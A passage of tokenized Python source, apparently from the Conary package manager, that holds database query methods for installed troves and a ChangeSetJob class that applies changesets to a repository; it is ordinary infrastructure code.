name , pinnedInfo [ <NUM_LIT:0> ] . asString ( ) , pinnedFlavor , <EOL> mapInfo [ <NUM_LIT:0> ] . asString ( ) , <EOL> "<STR_LIT::>" . join ( [ "<STR_LIT>" % x for x in mapInfo [ <NUM_LIT:0> ] . timeStamps ( ) ] ) , <EOL> mapFlavor ) <EOL> cu . executemany ( "<STR_LIT>" , <EOL> _iter ( mapList ) ) <EOL> cu . execute ( """<STR_LIT>""" ) <EOL> cu . execute ( "<STR_LIT>" ) <EOL> def getTroveContainers ( self , l ) : <EOL> """<STR_LIT>""" <EOL> return self . _getTroveInclusions ( l , False , weakRefs = False , <EOL> pristineOnly = False ) <EOL> def getTroveTroves ( self , l , weakRefs = False , justPresent = False , <EOL> pristineOnly = True ) : <EOL> """<STR_LIT>""" <EOL> return self . _getTroveInclusions ( l , True , weakRefs = weakRefs , <EOL> justPresent = justPresent , <EOL> pristineOnly = pristineOnly ) <EOL> def _getTroveInclusions ( self , l , included , weakRefs = False , <EOL> justPresent = False , pristineOnly = True ) : <EOL> cu = self . db . cursor ( ) <EOL> cu . execute ( """<STR_LIT>""" % self . db . keywords , start_transaction = False ) <EOL> result = [ ] <EOL> def _iter ( infoList , resultList ) : <EOL> for idx , info in enumerate ( infoList ) : <EOL> resultList . append ( [ ] ) <EOL> yield ( idx , info [ <NUM_LIT:0> ] , info [ <NUM_LIT:1> ] . asString ( ) , info [ <NUM_LIT:2> ] . freeze ( ) ) <EOL> cu . executemany ( "<STR_LIT>" , <EOL> _iter ( l , result ) , start_transaction = False ) <EOL> if included : <EOL> sense = ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> else : <EOL> sense = ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> if justPresent : <EOL> presentFilter = "<STR_LIT>" <EOL> else : <EOL> presentFilter = "<STR_LIT>" <EOL> if pristineOnly : <EOL> pristineFilter = "<STR_LIT>" <EOL> else : <EOL> pristineFilter = "<STR_LIT>" <EOL> if weakRefs : <EOL> weakRefsFilter = <NUM_LIT:0> <EOL> else : <EOL> weakRefsFilter = schema . TROVE_TROVES_WEAKREF <EOL> sql = """<STR_LIT>""" % ( sense + ( presentFilter , pristineFilter , <EOL> weakRefsFilter ) ) <EOL> cu . execute ( sql ) <EOL> for ( idx , name , version , flavor , ts , flags ) in cu : <EOL> ts = [ float ( x ) for x in ts . split ( "<STR_LIT::>" ) ] <EOL> result [ idx ] . append ( ( name , <EOL> versions . VersionFromString ( version , <EOL> timeStamps = ts ) , <EOL> deps . deps . ThawFlavor ( flavor ) ) ) <EOL> cu . execute ( "<STR_LIT>" , start_transaction = False ) <EOL> return result <EOL> def findTroveContainers ( self , names ) : <EOL> cu = self . db . cursor ( ) <EOL> cu . execute ( """<STR_LIT>""" % self . db . keywords , start_transaction = False ) <EOL> cu . executemany ( "<STR_LIT>" , enumerate ( names ) , <EOL> start_transaction = False ) <EOL> cu . execute ( """<STR_LIT>""" ) <EOL> result = [ [ ] for x in names ] <EOL> for ( idx , name , version , flavor ) in cu : <EOL> result [ idx ] . append ( ( name , versions . VersionFromString ( version ) , <EOL> deps . deps . ThawFlavor ( flavor ) ) ) <EOL> cu . execute ( "<STR_LIT>" , start_transaction = False ) <EOL> return result <EOL> def findTroveReferences ( self , names ) : <EOL> """<STR_LIT>""" <EOL> cu = self . db . cursor ( ) <EOL> cu . execute ( """<STR_LIT>""" % self . db . keywords , start_transaction = False ) <EOL> cu . executemany ( "<STR_LIT>" , <EOL> enumerate ( names ) , start_transaction = False ) <EOL> cu . execute ( """<STR_LIT>""" ) <EOL> result = [ [ ] for x in names ] <EOL> for ( idx , name , version , flavor ) in cu : <EOL> result [ idx ] . append ( ( name , versions . VersionFromString ( version ) , <EOL> deps . deps . ThawFlavor ( flavor ) ) ) <EOL> cu . execute ( "<STR_LIT>" , start_transaction = False ) <EOL> return result <EOL> def findUnreferencedTroves ( self ) : <EOL> cu = self . db . cursor ( ) <EOL> cu . execute ( """<STR_LIT>""" ) <EOL> l = [ ] <EOL> for ( name , version , flavorStr ) in cu : <EOL> if flavorStr is None : <EOL> flavorStr = deps . deps . Flavor ( ) <EOL> else : <EOL> flavorStr = deps . deps . ThawFlavor ( flavorStr ) <EOL> l . append ( ( name , versions . VersionFromString ( version ) , flavorStr ) ) <EOL> return l <EOL> def iterUpdateContainerInfo ( self , troveNames = None ) : <EOL> """<STR_LIT>""" <EOL> cu = self . db . cursor ( ) <EOL> if troveNames : <EOL> cu . execute ( "<STR_LIT>" , <EOL> start_transaction = False ) <EOL> cu . executemany ( <EOL> """<STR_LIT>""" , troveNames , start_transaction = False ) <EOL> cu . execute ( '''<STR_LIT>''' , start_transaction = False ) <EOL> fromClause = '<STR_LIT>' <EOL> else : <EOL> fromClause = '<STR_LIT>' <EOL> cu . execute ( """<STR_LIT>""" % fromClause ) <EOL> versionCache = VersionCache ( ) <EOL> flavorCache = FlavorCache ( ) <EOL> for ( isPresent , name , versionStr , timeStamps , flavorStr , <EOL> parentName , parentVersionStr , parentTimeStamps , parentFlavor , <EOL> flags ) in cu : <EOL> if parentName : <EOL> weakRef = flags & schema . TROVE_TROVES_WEAKREF <EOL> v = versionCache . get ( parentVersionStr , parentTimeStamps ) <EOL> f = flavorCache . get ( parentFlavor ) <EOL> parentInfo = ( parentName , v , f ) <EOL> else : <EOL> weakRef = False <EOL> parentInfo = None <EOL> version = versionCache . get ( versionStr , timeStamps ) <EOL> flavor = flavorCache . get ( flavorStr ) <EOL> yield ( ( name , version , flavor ) , parentInfo , isPresent , weakRef ) <EOL> if troveNames : <EOL> cu . execute ( "<STR_LIT>" , start_transaction = False ) <EOL> def getAllTroveInfo ( self , troveInfoTag ) : <EOL> cu = self . db . cursor ( ) <EOL> cu . execute ( """<STR_LIT>""" , troveInfoTag ) <EOL> versionCache = VersionCache ( ) <EOL> flavorCache = FlavorCache ( ) <EOL> return [ ( <EOL> TroveTuple ( name = x [ <NUM_LIT:0> ] , <EOL> version = versionCache . get ( x [ <NUM_LIT:1> ] , x [ <NUM_LIT:2> ] ) , <EOL> flavor = flavorCache . get ( x [ <NUM_LIT:3> ] ) ) , <EOL> x [ <NUM_LIT:4> ] ) for x in cu ] <EOL> def _getTroveInfo ( self , troveList , troveInfoTag ) : <EOL> cu = self . db . cursor ( ) <EOL> cu . execute ( """<STR_LIT>""" % self . db . keywords , start_transaction = False ) <EOL> r = [ ] <EOL> def _iter ( tl , r ) : <EOL> for i , ( name , version , flavor ) in enumerate ( tl ) : <EOL> flavorId = self . flavors . get ( flavor , None ) <EOL> if flavorId is None : <EOL> continue <EOL> versionId = self . versionTable . get ( version , None ) <EOL> if versionId is None : <EOL> continue <EOL> r . append ( None ) <EOL> yield ( i , name , versionId , flavorId ) <EOL> cu . executemany ( "<STR_LIT>" , <EOL> _iter ( troveList , r ) , start_transaction = False ) <EOL> cu . execute ( """<STR_LIT>""" , troveInfoTag ) <EOL> for ( idx , data ) in cu : <EOL> r [ idx ] = trove . TroveInfo . streamDict [ troveInfoTag ] [ <NUM_LIT:1> ] ( data ) <EOL> cu . execute ( "<STR_LIT>" , start_transaction = False ) <EOL> return r <EOL> def getPathHashesForTroveList ( self , troveList ) : <EOL> """<STR_LIT>""" <EOL> return self . _getTroveInfo ( troveList , trove . _TROVEINFO_TAG_PATH_HASHES ) <EOL> def getCapsulesTroveList ( self , troveList ) : <EOL> """<STR_LIT>""" <EOL> return self . _getTroveInfo ( troveList , trove . _TROVEINFO_TAG_CAPSULE ) <EOL> def getTroveScripts ( self , troveList ) : <EOL> """<STR_LIT>""" <EOL> return self . _getTroveInfo ( troveList , trove . _TROVEINFO_TAG_SCRIPTS ) <EOL> def getTroveCompatibilityClass ( self , name , version , flavor ) : <EOL> if flavor is None or flavor . isEmpty ( ) : <EOL> flavorClause = "<STR_LIT>" <EOL> else : <EOL> flavorClause = "<STR_LIT>" % flavor . freeze ( ) <EOL> cu = self . db . cursor ( ) <EOL> cu . execute ( """<STR_LIT>""" % flavorClause , trove . _TROVEINFO_TAG_COMPAT_CLASS , <EOL> name , str ( version ) ) <EOL> l = cu . fetchall ( ) <EOL> if not l : <EOL> raise KeyError <EOL> elif l [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] is None : <EOL> return <NUM_LIT:0> <EOL> return streams . ShortStream ( l [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] ) ( ) <EOL> def findRemovedByName ( self , name ) : <EOL> """<STR_LIT>""" <EOL> cu = self . db . cursor ( ) <EOL> cu . execute ( """<STR_LIT>""" , name ) <EOL> return [ ( n , versions . VersionFromString ( v ) , <EOL> deps . deps . ThawFlavor ( f ) ) for ( n , v , f ) in cu ] <EOL> def findByNames ( self , nameList ) : <EOL> cu = self . db . cursor ( ) <EOL> cu . execute ( """<STR_LIT>""" % <EOL> "<STR_LIT:U+002C>" . join ( [ "<STR_LIT>" % x for x in nameList ] ) ) <EOL> versionCache = VersionCache ( ) <EOL> flavorCache = FlavorCache ( ) <EOL> l = [ ] <EOL> for ( name , version , flavor , timeStamps ) in cu : <EOL> version = versionCache . get ( version , timeStamps ) <EOL> flavor = flavorCache . get ( flavor ) <EOL> l . append ( ( name , version , flavor ) ) <EOL> return l <EOL> def troveIsIncomplete ( self , name , version , flavor ) : <EOL> cu = self . db . cursor ( ) <EOL> if isinstance ( flavor , deps . deps . Flavor ) and not flavor . isEmpty ( ) : <EOL> flavorStr = '<STR_LIT>' <EOL> flavorArgs = [ flavor . freeze ( ) ] <EOL> else : <EOL> flavorStr = '<STR_LIT>' <EOL> flavorArgs = [ ] <EOL> cu . execute ( """<STR_LIT>""" % flavorStr , <EOL> [ trove . _TROVEINFO_TAG_INCOMPLETE , <EOL> name , str ( version ) ] + flavorArgs ) <EOL> frzIncomplete = cu . next ( ) [ <NUM_LIT:0> ] <EOL> return streams . ByteStream ( frzIncomplete ) ( ) != <NUM_LIT:0> <EOL> def iterFilesWithTag ( self , tag ) : <EOL> return self . troveFiles . iterFilesWithTag ( tag ) <EOL> def getTrovesWithProvides ( self , depSetList ) : <EOL> return self . depTables . getLocalProvides ( depSetList ) <EOL> def getCompleteTroveSet ( self , names ) : <EOL> cu = self . db . cursor ( ) <EOL> cu . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" % self . db . keywords , <EOL> start_transaction = False ) <EOL> cu . executemany ( "<STR_LIT>" , names , <EOL> start_transaction = False ) <EOL> cu . execute ( """<STR_LIT>""" ) <EOL> installedNotReferenced = [ ] <EOL> installedAndReferenced = [ ] <EOL> referencedStrong = [ ] <EOL> referencedWeak = [ ] <EOL> versionCache = VersionCache ( ) <EOL> flavorCache = FlavorCache ( ) <EOL> for ( name , version , flavor , isPresent , timeStamps , flags , <EOL> hasParent ) in cu : <EOL> v = versionCache . get ( version , timeStamps ) <EOL> f = flavorCache . get ( flavor ) <EOL> info = ( name , v , f ) <EOL> if isPresent : <EOL> if hasParent : <EOL> installedAndReferenced . append ( info ) <EOL> else : <EOL> installedNotReferenced . append ( info ) <EOL> elif flags & schema . TROVE_TROVES_WEAKREF : <EOL> referencedWeak . append ( info ) <EOL> else : <EOL> referencedStrong . append ( info ) <EOL> cu . execute ( "<STR_LIT>" , start_transaction = False ) <EOL> referencedStrong = set ( referencedStrong ) <EOL> installedAndReferenced = set ( installedAndReferenced ) <EOL> return ( set ( installedNotReferenced ) - installedAndReferenced , <EOL> installedAndReferenced , <EOL> referencedStrong , <EOL> set ( referencedWeak ) - referencedStrong ) <EOL> def getMissingPathIds ( self , name , version , flavor ) : <EOL> cu = self . db . cursor ( ) <EOL> flavorId = self . flavors . get ( flavor , None ) <EOL> if flavorId is None : <EOL> raise KeyError <EOL> versionId = self . versionTable . get ( version , None ) <EOL> if versionId is None : <EOL> raise KeyError <EOL> cu . execute ( """<STR_LIT>""" , <EOL> name , versionId , flavorId ) <EOL> return [ x [ <NUM_LIT:0> ] for x in cu ] <EOL> def _getTransactionCounter ( self , field ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT>' not in self . db . tables : <EOL> return False , <NUM_LIT:0> <EOL> cu = self . db . cursor ( ) <EOL> cu . execute ( "<STR_LIT>" , <EOL> field ) <EOL> try : <EOL> row = cu . next ( ) <EOL> counter = row [ <NUM_LIT:0> ] <EOL> except StopIteration : <EOL> return False , <NUM_LIT:0> <EOL> try : <EOL> counter = int ( counter ) <EOL> except ValueError : <EOL> return True , <NUM_LIT:0> <EOL> return True , counter <EOL> def getTransactionCounter ( self ) : <EOL> """<STR_LIT>""" <EOL> field = "<STR_LIT>" <EOL> return self . _getTransactionCounter ( field ) [ <NUM_LIT:1> ] <EOL> def incrementTransactionCounter ( self ) : <EOL> """<STR_LIT>""" <EOL> field = "<STR_LIT>" <EOL> exists , counter = self . _getTransactionCounter ( field ) <EOL> cu = self . db . cursor ( ) <EOL> if not exists : <EOL> cu . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" , field , '<STR_LIT:1>' ) <EOL> return <NUM_LIT:1> <EOL> counter += <NUM_LIT:1> <EOL> cu . execute ( "<STR_LIT>" , <EOL> str ( counter ) , field ) <EOL> return counter <EOL> def close ( self ) : <EOL> self . db . close ( ) </s>
<s> import itertools <EOL> import time <EOL> from conary . repository import changeset , errors , filecontents <EOL> from conary import files , trove <EOL> from conary . lib import log , patch , sha1helper , util <EOL> class AbstractTroveDatabase : <EOL> def commitChangeSet ( self , cs ) : <EOL> raise NotImplementedError <EOL> def getFileVersion ( self , pathId , fileId , version , withContents = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def getFileVersions ( self , l ) : <EOL> """<STR_LIT>""" <EOL> for x in l : <EOL> yield self . getFileVersion ( * x ) <EOL> def getFileContents ( self , fileList ) : <EOL> raise NotImplementedError <EOL> def getTrove ( self , troveName , version , flavor , withFiles = True ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def getTroves ( self , troveList ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def iterAllTroveNames ( self , serverName ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def iterFilesInTrove ( self , troveName , version , flavor , <EOL> sortByPath = False , withFiles = False ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> class IdealRepository ( AbstractTroveDatabase ) : <EOL> def createBranch ( self , newBranch , where , troveList = [ ] ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def getTroveVersionList ( self , troveNameList ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def getAllTroveLeaves ( self , troveNameList ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def getTroveLeavesByLabel ( self , troveNameList , label ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def getTroveVersionsByLabel ( self , troveNameList , label ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def getTroveLatestVersion ( self , troveName , branch ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def getAllTroveFlavors ( self , troveDict ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def queryMerge ( self , target , source ) : <EOL> """<STR_LIT>""" <EOL> for ( name , verDict ) in source . iteritems ( ) : <EOL> if not target . has_key ( name ) : <EOL> target [ name ] = verDict <EOL> else : <EOL> for ( version , flavorList ) in verDict . iteritems ( ) : <EOL> if not target [ name ] . has_key ( version ) : <EOL> target [ name ] [ version ] = flavorList <EOL> else : <EOL> target [ name ] [ version ] += flavorList <EOL> class AbstractRepository ( IdealRepository ) : <EOL> def hasTroveByName ( self , troveName ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def hasTrove ( self , troveName , version , flavor ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def getTroveInfo ( self , infoType , troveList ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def getTroveReferences ( self , troveInfoList ) : <EOL> """<STR_LIT>""" <EOL> def getTroveDescendants ( self , troveList ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> assert ( self . __class__ != AbstractRepository ) <EOL> class ChangeSetJob : <EOL> """<STR_LIT>""" <EOL> storeOnlyConfigFiles = False <EOL> def addTrove ( self , oldTroveSpec , trove , trvCs , hidden = False ) : <EOL> return self . repos . addTrove ( trove , trvCs , hidden = hidden , <EOL> oldTroveSpec = oldTroveSpec ) <EOL> def addTroveDone ( self , troveId , mirror = False ) : <EOL> self . repos . addTroveDone ( troveId , mirror = mirror ) <EOL> def oldTrove ( self , * args ) : <EOL> pass <EOL> def markTroveRemoved ( self , name , version , flavor ) : <EOL> raise NotImplementedError <EOL> def invalidateRollbacks ( self , set = None ) : <EOL> if set is not None : <EOL> self . invalidateRollbacksFlag = set <EOL> else : <EOL> return self . invalidateRollbacksFlag <EOL> def addFileContents ( self , sha1 , fileContents , restoreContents , isConfig , <EOL> precompressed = False ) : <EOL> self . repos . _storeFileFromContents ( fileContents , sha1 , restoreContents , <EOL> precompressed = precompressed ) <EOL> def addFileVersion ( self , troveInfo , pathId , path , fileId , <EOL> newVersion , fileStream = None , withContents = True ) : <EOL> self . repos . addFileVersion ( troveInfo , pathId , path , fileId , newVersion , <EOL> fileStream = fileStream , <EOL> withContents = withContents ) <EOL> def checkTroveCompleteness ( self , trv ) : <EOL> pass <EOL> def checkTroveSignatures ( self , trv , callback ) : <EOL> assert ( hasattr ( callback , '<STR_LIT>' ) ) <EOL> return callback . verifyTroveSignatures ( trv ) <EOL> def _handleContents ( self , pathId , fileId , fileStream , <EOL> configRestoreList , normalRestoreList , <EOL> oldFileId = None , oldVersion = None , oldfile = None , <EOL> restoreContents = True ) : <EOL> repos = self . repos <EOL> if not fileStream or not restoreContents : <EOL> return <EOL> hasContents = ( files . frozenFileHasContents ( fileStream ) and <EOL> not files . frozenFileFlags ( fileStream ) . isEncapsulatedContent ( ) ) <EOL> if not hasContents : <EOL> return <EOL> fileFlags = files . frozenFileFlags ( fileStream ) <EOL> if self . storeOnlyConfigFiles and not fileFlags . isConfig ( ) : <EOL> return <EOL> contentInfo = files . frozenFileContentInfo ( fileStream ) <EOL> if fileFlags . isConfig ( ) : <EOL> tup = ( pathId , fileId , contentInfo . sha1 ( ) , <EOL> oldfile , fileId , oldVersion , oldFileId , <EOL> restoreContents ) <EOL> configRestoreList . append ( tup ) <EOL> else : <EOL> tup = ( pathId , fileId , contentInfo . sha1 ( ) , <EOL> restoreContents ) <EOL> normalRestoreList . append ( tup ) <EOL> def _containsFileContents ( self , sha1iter ) : <EOL> raise NotImplementedError <EOL> def _filterRestoreList ( self , configRestoreList , normalRestoreList ) : <EOL> def filterOne ( l , isConfig ) : <EOL> newL = [ ] <EOL> inReposList = self . _containsFileContents ( tup [ <NUM_LIT:2> ] for tup in l ) <EOL> for tup , inRepos in itertools . izip ( l , inReposList ) : <EOL> if inRepos : <EOL> ( pathId , fileId , sha1 ) = tup [ <NUM_LIT:0> : <NUM_LIT:3> ] <EOL> restoreContents = tup [ - <NUM_LIT:1> ] <EOL> fileContents = filecontents . FromDataStore ( <EOL> self . repos . contentsStore , sha1 ) <EOL> contType = changeset . ChangedFileTypes . file <EOL> self . addFileContents ( sha1 , fileContents , <EOL> restoreContents , isConfig ) <EOL> else : <EOL> newL . append ( tup ) <EOL> return newL <EOL> configRestoreList = filterOne ( configRestoreList , True ) <EOL> normalRestoreList = filterOne ( normalRestoreList , False ) <EOL> return configRestoreList , normalRestoreList <EOL> def _getCheckFilesList ( self , csTrove , troveInfo , fileHostFilter , <EOL> configRestoreList , normalRestoreList , restoreContents = True ) : <EOL> checkFilesList = [ ] <EOL> for ( pathId , path , fileId , newVersion ) in csTrove . getNewFileList ( ) : <EOL> if ( fileHostFilter <EOL> and newVersion . getHost ( ) not in fileHostFilter ) : <EOL> fileObj = None <EOL> fileStream = None <EOL> else : <EOL> fileStream = self . cs . getFileChange ( None , fileId ) <EOL> if fileStream is None : <EOL> if not fileHostFilter : <EOL> raise KeyError <EOL> checkFilesList . append ( ( pathId , fileId , newVersion ) ) <EOL> fileObj = None <EOL> else : <EOL> fileObj = files . ThawFile ( fileStream , pathId ) <EOL> if fileObj and fileObj . fileId ( ) != fileId : <EOL> raise trove . TroveIntegrityError ( csTrove . getName ( ) , <EOL> csTrove . getNewVersion ( ) , csTrove . getNewFlavor ( ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % <EOL> sha1helper . md5ToString ( pathId ) ) <EOL> self . addFileVersion ( troveInfo , pathId , path , fileId , <EOL> newVersion , fileStream = fileStream , <EOL> withContents = restoreContents ) <EOL> self . _handleContents ( pathId , fileId , fileStream , configRestoreList , <EOL> normalRestoreList , <EOL> restoreContents = restoreContents ) <EOL> return checkFilesList <EOL> def _createInstallTroveObjects ( self , fileHostFilter = [ ] , <EOL> callback = None , hidden = False , <EOL> mirror = False , allowIncomplete = False , <EOL> ) : <EOL> configRestoreList = [ ] <EOL> normalRestoreList = [ ] <EOL> checkFilesList = [ ] <EOL> newList = [ x for x in self . cs . iterNewTroveList ( ) ] <EOL> repos = self . repos <EOL> cs = self . cs <EOL> oldTrovesNeeded = [ x . getOldNameVersionFlavor ( ) for x in <EOL> newList if x . getOldVersion ( ) ] <EOL> oldTroveIter = repos . iterTroves ( oldTrovesNeeded , hidden = True ) <EOL> troveNo = <NUM_LIT:0> <EOL> for csTrove in newList : <EOL> if csTrove . troveType ( ) == trove . TROVE_TYPE_REMOVED : <EOL> continue <EOL> troveNo += <NUM_LIT:1> <EOL> if callback : <EOL> callback . creatingDatabaseTransaction ( troveNo , len ( newList ) ) <EOL> newVersion = csTrove . getNewVersion ( ) <EOL> oldTroveVersion = csTrove . getOldVersion ( ) <EOL> oldTroveFlavor = csTrove . getOldFlavor ( ) <EOL> troveName = csTrove . getName ( ) <EOL> troveFlavor = csTrove . getNewFlavor ( ) <EOL> if repos . hasTrove ( troveName , newVersion , troveFlavor ) : <EOL> raise errors . CommitError , "<STR_LIT>" % ( newVersion . asString ( ) , csTrove . getName ( ) ) <EOL> if oldTroveVersion : <EOL> newTrove = oldTroveIter . next ( ) <EOL> assert ( newTrove . getNameVersionFlavor ( ) == <EOL> csTrove . getOldNameVersionFlavor ( ) ) <EOL> self . oldTrove ( newTrove , csTrove , troveName , oldTroveVersion , <EOL> oldTroveFlavor ) <EOL> oldCompatClass = newTrove . getCompatibilityClass ( ) <EOL> if csTrove . isRollbackFence ( <EOL> oldCompatibilityClass = oldCompatClass , <EOL> update = True ) : <EOL> self . invalidateRollbacks ( set = True ) <EOL> else : <EOL> newTrove = trove . Trove ( csTrove . getName ( ) , newVersion , <EOL> troveFlavor , csTrove . getChangeLog ( ) , <EOL> setVersion = False ) <EOL> allowIncomplete = True <EOL> newFileMap = newTrove . applyChangeSet ( csTrove , <EOL> needNewFileMap = True , <EOL> allowIncomplete = allowIncomplete ) <EOL> if newTrove . troveInfo . incomplete ( ) : <EOL> log . warning ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> newTrove . getName ( ) , newTrove . troveInfo . troveVersion ( ) , <EOL> trove . TROVE_VERSION ) <EOL> self . checkTroveCompleteness ( newTrove ) <EOL> self . checkTroveSignatures ( newTrove , callback = callback ) <EOL> if oldTroveVersion is not None : <EOL> troveInfo = self . addTrove ( <EOL> ( troveName , oldTroveVersion , oldTroveFlavor ) , newTrove , <EOL> csTrove , hidden = hidden ) <EOL> else : <EOL> troveInfo = self . addTrove ( None , newTrove , csTrove , <EOL> hidden = hidden ) <EOL> checkFilesList += self . _getCheckFilesList ( csTrove , troveInfo , <EOL> fileHostFilter , configRestoreList , normalRestoreList , <EOL> restoreContents = True ) <EOL> for ( pathId , path , fileId , newVersion ) in newTrove . iterFileList ( members = True , <EOL> capsules = True ) : <EOL> if pathId in newFileMap : <EOL> continue <EOL> self . addFileVersion ( troveInfo , pathId , path , fileId , <EOL> newVersion , withContents = True ) <EOL> filesNeeded = [ ] <EOL> for i , ( pathId , path , fileId , newVersion ) in enumerate ( csTrove . getChangedFileList ( ) ) : <EOL> tup = newFileMap [ pathId ] <EOL> ( oldPath , oldFileId , oldVersion ) = tup [ - <NUM_LIT:3> : ] <EOL> if path is None : <EOL> path = oldPath <EOL> if fileId is None : <EOL> oldFileId = fileId <EOL> if newVersion is None : <EOL> newVersion = oldVersion <EOL> if ( fileHostFilter <EOL> and newVersion . getHost ( ) not in fileHostFilter ) : <EOL> fileStream = None <EOL> elif ( oldVersion == newVersion and oldFileId == fileId ) : <EOL> fileStream = None <EOL> else : <EOL> fileStream = cs . getFileChange ( oldFileId , fileId ) <EOL> if fileStream and fileStream [ <NUM_LIT:0> ] == "<STR_LIT>" : <EOL> if len ( fileStream ) != <NUM_LIT:2> : <EOL> filesNeeded . append ( ( i , ( pathId , oldFileId , <EOL> oldVersion ) ) ) <EOL> continue <EOL> fileStream = None <EOL> self . addFileVersion ( troveInfo , pathId , path , fileId , <EOL> newVersion , fileStream = fileStream , <EOL> withContents = True ) <EOL> if fileStream is not None : <EOL> self . _handleContents ( pathId , fileId , fileStream , <EOL> configRestoreList , normalRestoreList , <EOL> oldFileId = oldFileId , <EOL> oldVersion = oldVersion , <EOL> oldfile = None , <EOL> restoreContents = True ) <EOL> oldFileObjects = list ( repos . getFileVersions ( <EOL> [ x [ <NUM_LIT:1> ] for x in filesNeeded ] ) ) <EOL> for i , ( pathId , path , fileId , newVersion ) in enumerate ( csTrove . getChangedFileList ( ) ) : <EOL> if not filesNeeded or filesNeeded [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] != i : <EOL> continue <EOL> filesNeeded . pop ( <NUM_LIT:0> ) <EOL> tup = newFileMap [ pathId ] <EOL> ( oldPath , oldFileId , oldVersion ) = tup [ - <NUM_LIT:3> : ] <EOL> if path is None : <EOL> path = oldPath <EOL> if fileId is None : <EOL> oldFileId = fileId <EOL> if newVersion is None : <EOL> newVersion = oldVersion <EOL> restoreContents = True <EOL> diff = cs . getFileChange ( oldFileId , fileId ) <EOL> oldfile = oldFileObjects . pop ( <NUM_LIT:0> ) <EOL> fileObj = oldfile . copy ( ) <EOL> fileObj . twm ( diff , oldfile ) <EOL> assert ( fileObj . pathId ( ) == pathId ) <EOL> fileStream = fileObj . freeze ( ) <EOL> if ( not mirror ) and ( <EOL> fileObj . hasContents and fileObj . contents . sha1 ( ) == oldfile . contents . sha1 ( ) <EOL> and not ( fileObj . flags . isConfig ( ) and not oldfile . flags . isConfig ( ) ) ) : <EOL> restoreContents = False <EOL> if fileObj and fileObj . fileId ( ) != fileId : <EOL> raise trove . TroveIntegrityError ( csTrove . getName ( ) , <EOL> csTrove . getNewVersion ( ) , csTrove . getNewFlavor ( ) , <EOL> "<STR_LIT>" ) <EOL> self . addFileVersion ( troveInfo , pathId , path , fileId , <EOL> newVersion , fileStream = fileStream , <EOL> withContents = restoreContents ) <EOL> self . _handleContents ( pathId , fileId , fileStream , <EOL> configRestoreList , normalRestoreList , <EOL> oldFileId = oldFileId , <EOL> oldVersion = oldVersion , <EOL> oldfile = oldfile , <EOL> restoreContents = restoreContents ) <EOL> del newFileMap <EOL> self . addTroveDone ( troveInfo , mirror = mirror ) <EOL> try : <EOL> list ( repos . getFileVersions ( checkFilesList ) ) <EOL> except errors . FileStreamMissing , e : <EOL> info = [ x for x in checkFilesList if x [ <NUM_LIT:1> ] == e . fileId ] <EOL> ( pathId , fileId ) = info [ <NUM_LIT:0> ] [ <NUM_LIT:0> : <NUM_LIT:2> ] <EOL> raise errors . IntegrityError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % ( sha1helper . md5ToString ( pathId ) , <EOL> sha1helper . sha1ToString ( fileId ) ) ) <EOL> return troveNo , configRestoreList , normalRestoreList <EOL> @ staticmethod <EOL> def ptrCmp ( a , b ) : <EOL> if a [ <NUM_LIT:0> ] < b [ <NUM_LIT:0> ] : <EOL> return - <NUM_LIT:1> <EOL> elif a [ <NUM_LIT:0> ] > b [ <NUM_LIT:0> ] : <EOL> return <NUM_LIT:1> <EOL> elif not a [ <NUM_LIT:1> ] or not b [ <NUM_LIT:1> ] : <EOL> return <NUM_LIT:0> <EOL> elif a [ <NUM_LIT:1> ] < b [ <NUM_LIT:1> ] : <EOL> return - <NUM_LIT:1> <EOL> elif a [ <NUM_LIT:1> ] > b [ <NUM_LIT:1> ] : <EOL> return <NUM_LIT:1> <EOL> return <NUM_LIT:0> <EOL> def __init__ ( self , repos , cs , fileHostFilter = [ ] , callback = None , <EOL> resetTimestamps = False , allowIncomplete = False , <EOL> hidden = False , mirror = False , <EOL> preRestored = None , <EOL> ) : <EOL> self . repos = repos <EOL> self . cs = cs <EOL> self . invalidateRollbacksFlag = False <EOL> newList = [ x for x in cs . iterNewTroveList ( ) ] <EOL> if resetTimestamps : <EOL> now = time . time ( ) <EOL> slots = { } <EOL> for trvCs in newList : <EOL> slot = ( trvCs . getName ( ) , trvCs . getNewVersion ( ) . branch ( ) ) <EOL> slots . setdefault ( slot , set ( ) ) . add ( trvCs ) <EOL> for slot , troves in slots . iteritems ( ) : <EOL> nodes = { } <EOL> for trvCs in troves : <EOL> ver = trvCs . getNewVersion ( ) <EOL> nodes [ str ( ver ) ] = max ( nodes . get ( str ( ver ) , <NUM_LIT:0> ) , <EOL> ver . trailingRevision ( ) . timeStamp ) <EOL> newStamp = now <EOL> for ver , stamp in sorted ( nodes . items ( ) , key = lambda x : x [ <NUM_LIT:1> ] , <EOL> reverse = True ) : <EOL> for trvCs in troves : <EOL> if str ( trvCs . getNewVersion ( ) ) == ver : <EOL> trvCs . getNewVersion ( ) . 